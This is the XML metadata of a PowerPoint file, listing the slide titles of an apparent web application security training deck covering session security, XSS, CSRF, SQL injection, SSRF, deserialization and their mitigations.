      <vt:lpstr>Heartbleed</vt:lpstr>
      <vt:lpstr>Heartbleed</vt:lpstr>
      <vt:lpstr>Information Leakage from Test Environments</vt:lpstr>
      <vt:lpstr>Information Disclosure from Data Sets</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Session and Cookie Security</vt:lpstr>
      <vt:lpstr>What Exactly Are Sessions?</vt:lpstr>
      <vt:lpstr>C is for Cookie</vt:lpstr>
      <vt:lpstr>How Secure Are Cookies?</vt:lpstr>
      <vt:lpstr>What Do Cookies Look Like?</vt:lpstr>
      <vt:lpstr>Weak Session IDs and Session Hijack</vt:lpstr>
      <vt:lpstr>Weak Session IDs and Session Hijack</vt:lpstr>
      <vt:lpstr>Choose Your Own Session - Session Fixation </vt:lpstr>
      <vt:lpstr>When Should a Session “End?”</vt:lpstr>
      <vt:lpstr>PHP: An Example of Bad Session IDs</vt:lpstr>
      <vt:lpstr>20 bits</vt:lpstr>
      <vt:lpstr>Encrypted Cookies Are Not Enough</vt:lpstr>
      <vt:lpstr>Bit-flip to Victory</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Timing Attack</vt:lpstr>
      <vt:lpstr>Authentication Bypass</vt:lpstr>
      <vt:lpstr>Authentication Example: Proving Your Identity</vt:lpstr>
      <vt:lpstr>How is it Bypassed?</vt:lpstr>
      <vt:lpstr>What is an Authentication Bypass?</vt:lpstr>
      <vt:lpstr>Apple and #iamroot</vt:lpstr>
      <vt:lpstr>Apple and #iamroot</vt:lpstr>
      <vt:lpstr>Apple and #iamroot</vt:lpstr>
      <vt:lpstr>Apple and goto fail;</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Apple and goto fail;</vt:lpstr>
      <vt:lpstr>Linux Kernel Backdoor</vt:lpstr>
      <vt:lpstr>Linux Kernel Backdoor</vt:lpstr>
      <vt:lpstr>Mitigation</vt:lpstr>
      <vt:lpstr>Authorization Bypass</vt:lpstr>
      <vt:lpstr>Authorization Example: Verifying a User Has  a Right to Perform an Action</vt:lpstr>
      <vt:lpstr>How is it Bypassed?</vt:lpstr>
      <vt:lpstr>Types of Authorization</vt:lpstr>
      <vt:lpstr>Authorization Bypass</vt:lpstr>
      <vt:lpstr>Insecure Direct Object Reference</vt:lpstr>
      <vt:lpstr>IDOR AuthZ Bypass</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Cross-Site Scripting (XSS)</vt:lpstr>
      <vt:lpstr>JavaScript</vt:lpstr>
      <vt:lpstr>What is Cross-Site Scripting (XSS)?</vt:lpstr>
      <vt:lpstr>Example</vt:lpstr>
      <vt:lpstr>Reflection vs. Persistence </vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Limit Location of Untrusted Data</vt:lpstr>
      <vt:lpstr>Escape Data in Allowed Locations</vt:lpstr>
      <vt:lpstr>Defense in Depth</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Cross-Site Request Forgery (CSRF)</vt:lpstr>
      <vt:lpstr>Local File Inclusion (LFI)</vt:lpstr>
      <vt:lpstr>Local File Inclusion</vt:lpstr>
      <vt:lpstr>Local File Inclusion</vt:lpstr>
      <vt:lpstr>Local File Inclusion</vt:lpstr>
      <vt:lpstr>Local File Inclusion</vt:lpstr>
      <vt:lpstr>Local File Inclusion Impact</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Unsafe File I/O</vt:lpstr>
      <vt:lpstr>What is Unsafe File I/O?</vt:lpstr>
      <vt:lpstr>Unsafe Uploads</vt:lpstr>
      <vt:lpstr>Unrestricted PHP Uploads (Fake Example)</vt:lpstr>
      <vt:lpstr>Unsafe Upload Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Unsafe Upload Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Unsafe Upload Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Unsafe Upload Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Unsafe Upload Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Unsafe Upload Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Safer Upload Mitigations</vt:lpstr>
      <vt:lpstr>Safer Upload Mitigations</vt:lpstr>
      <vt:lpstr>Safer Upload Mitigations</vt:lpstr>
      <vt:lpstr>Unsafe Downloads</vt:lpstr>
      <vt:lpstr>Unsafe Downloads</vt:lpstr>
      <vt:lpstr>Safe Download Mitigations</vt:lpstr>
      <vt:lpstr>Open Redirects and SSRF: Badness with URLs </vt:lpstr>
      <vt:lpstr>Improving UX with Redirects </vt:lpstr>
      <vt:lpstr>Improving UX Hacks with Redirects </vt:lpstr>
      <vt:lpstr>Impact of Open Redirect</vt:lpstr>
      <vt:lpstr>Open Redirect Mitigation</vt:lpstr>
      <vt:lpstr>Server-Side Request Forgery</vt:lpstr>
      <vt:lpstr>Server-Side Request Forgery</vt:lpstr>
      <vt:lpstr>Server-Side Request Forgery</vt:lpstr>
      <vt:lpstr>SSRF Example </vt:lpstr>
      <vt:lpstr>Mitigating the Likelihood of SSRF Attacks</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>Denial of Service</vt:lpstr>
      <vt:lpstr>SQL Injection (SQLi)</vt:lpstr>
      <vt:lpstr>What’s a SQL?</vt:lpstr>
      <vt:lpstr>How Does SQLi Work?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Impact of SQLi</vt:lpstr>
      <vt:lpstr>Impact of SQLi</vt:lpstr>
      <vt:lpstr>Impact of SQLi</vt:lpstr>
      <vt:lpstr>Real World Examples</vt:lpstr>
      <vt:lpstr>Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Mitigations (that don’t work)</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Code  Execution</vt:lpstr>
      <vt:lpstr>What is Remote Code Execution (RCE)?</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>Buffer Overflows</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Real World Examples</vt:lpstr>
      <vt:lpstr>Buffer Overflow Mitigation</vt:lpstr>
      <vt:lpstr>What is Command Injection?</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection</vt:lpstr>
      <vt:lpstr>Command Injection Mitigations</vt:lpstr>
      <vt:lpstr>Unsafe Deserialization</vt:lpstr>
      <vt:lpstr>Serialization Overview</vt:lpstr>
      <vt:lpstr>Serialization Overview</vt:lpstr>
      <vt:lpstr>Apache Struts and Equifax</vt:lpstr>
      <vt:lpstr>Apache Struts and Equifax</vt:lpstr>
      <vt:lpstr>Serialization Exploitation: Python</vt:lpstr>
      <vt:lpstr>Serialization Exploitation: Python</vt:lpstr>
      <vt:lpstr>Mitigations</vt:lpstr>
      <vt:lpstr>Want to Learn More?[REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE] [REPLACE]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Best Use This Material...</dc:title>
  <cp:lastModifiedBy>Mark Stanislav</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-10-22T15:52:19Z</dcterms:modified>
</cp:coreProperties>
</file>